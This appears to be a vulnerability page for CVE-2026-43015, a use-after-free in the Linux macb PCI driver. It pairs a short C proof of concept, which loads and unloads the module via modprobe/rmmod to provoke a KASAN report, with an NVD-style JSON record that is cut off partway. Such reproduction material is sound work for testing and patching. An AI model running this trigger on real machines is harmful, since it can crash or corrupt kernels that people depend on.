CVE-2026-43015

/* * PoC for CVE-2026-43015: Trigger UAF in macb driver * Compile: gcc -o poc poc.c * Usage: sudo ./poc * Requires root privileges to load/unload kernel modules. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main() { printf("[*] Attempting to trigger CVE-2026-43015...\n"); // Step 1: Load the vulnerable driver printf("[*] Loading macb_pci driver...\n"); system("modprobe macb_pci"); printf("[*] Waiting for device registration...\n"); sleep(1); // Step 2: Remove the driver to trigger the race condition printf("[*] Removing macb_pci driver to trigger UAF...\n"); // The UAF occurs during remove path interacting with runtime resume system("rmmod macb_pci"); printf("[*] Check dmesg for KASAN use-after-free reports.\n"); return 0; }

{"cve": {"id": "CVE-2026-43015", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:45.500", "lastModified": "2026-05-07T20:31:01.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: macb: fix clk handling on PCI glue driver removal\n\nplatform_device_unregister() may still want to use the registered clks\nduring runtime resume callback.\n\nNote that there is a commit d82d5303c4c5 (\"net: macb: fix use after free\non rmmod\") that addressed the similar problem of clk vs platform device\nunregistration but just moved the bug to another place.\n\nSave the pointers to clks into local variables for reuse after platform\ndevice is unregistered.\n\nBUG: KASAN: use-after-free in clk_prepare+0x5a/0x60\nRead of size 8 at addr ffff888104f85e00 by task modprobe/597\n\nCPU: 2 PID: 597 Comm: modprobe Not tainted 6.1.164+ #114\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.1-0-g3208b098f51a-prebuilt.qemu.org 04/01/2014\nCall Trace:\n <TASK>\n dump_stack_lvl+0x8d/0xba\n print_report+0x17f/0x496\n kasan_report+0xd9/0x180\n clk_prepare+0x5a/0x60\n macb_runtime_resume+0x13d/0x410 [macb]\n pm_generic_runtime_resume+0x97/0xd0\n __rpm_callback+0xc8/0x4d0\n rpm_callback+0xf6/0x230\n rpm_resume+0xeeb/0x1a70\n __pm_runtime_resume+0xb4/0x170\n bus_remove_device+0x2e3/0x4b0\n device_del+0x5b3/0xdc0\n platform_device_del+0x4e/0x280\n platform_device_unregister+0x11/0x50\n pci_device_remove+0xae/0x210\n device_remove+0xcb/0x180\n device_release_driver_internal+0x529/0x770\n driver_detach+0xd4/0x1a0\n bus_remove_driver+0x135/0x260\n driver_unregister+0x72/0xb0\n pci_unregister_driver+0x26/0x220\n __do_sys_delete_module+0x32e/0x550\n do_syscall_64+0x35/0x80\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n </TASK>\n\nAllocated by task 519:\n kasan_save_stack+0x2c/0x50\n kasan_set_track+0x21/0x30\n __kasan_kmalloc+0x8e/0x90\n __clk_register+0x458/0x2890\n clk_hw_register+0x1a/0x60\n __clk_hw_register_fixed_rate+0x255/0x410\n clk_register_fixed_rate+0x3c/0xa0\n macb_probe+0x1d8/0x42e [macb_pci]\n local_pci_probe+0xd7/0x190\n pci_device_probe+0x252/0x600\n really_probe+0x255/0x7f0\n __driver_probe_device+0x1ee/0x330\n driver_probe_device+0x4c/0x1f0\n __driver_attach+0x1df/0x4e0\n bus_for_each_dev+0x15d/0x1f0\n bus_add_driver+0x486/0x5e0\n driver_register+0x23a/0x3d0\n do_one_initcall+0xfd/0x4d0\n do_init_module+0x18b/0x5a0\n load_module+0x5663/0x7950\n __do_sys_finit_module+0x101/0x180\n do_syscall_64+0x35/0x80\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\nFreed by task 597:\n kasan_save_stack+0x2c/0x50\n kasan_set_track+0x21/0x30\n kasan_save_free_info+0x2a/0x50\n __kasan_slab_free+0x106/0x180\n __kmem_cache_free+0xbc/0x320\n clk_unregister+0x6de/0x8d0\n macb_remove+0x73/0xc0 [macb_pci]\n pci_device_remove+0xae/0x210\n device_remove+0xcb/0x180\n device_release_driver_internal+0x529/0x770\n driver_detach+0xd4/0x1a0\n bus_remove_driver+0x135/0x260\n driver_unregister+0x72/0xb0\n pci_unregister_driver+0x26/0x220\n __do_sys_delete_module+0x32e/0x550\n do_syscall_64+0x35/0x80\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.14.249", "versionEndExcluding": "4.15", "matchCriteriaId": "6C7BA96F-21C7-4288-964A-EF9BE063F10F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.19.209", "versionEndExcluding": "4.20", "matchCriteriaId": "CBD58BDD-7858-41D3-A177-610A35D99A2A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.4.150", "versionEndExcluding": "5.5", "matchCriteriaId": "4A14F6E6-3CD1-43E4-9D39-89A759035022"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.70", "versionEndExcluding": "5.10.253", "matchCriteriaId": "249A6351-8463-4B4B-B38D-E578A7F261FF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.14.9", "versionEndExcluding": "5.15", "matchCriteriaId": "8BDD92CA-4CB7-46E8-85F7-892EB6C17032"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:* ... (truncated)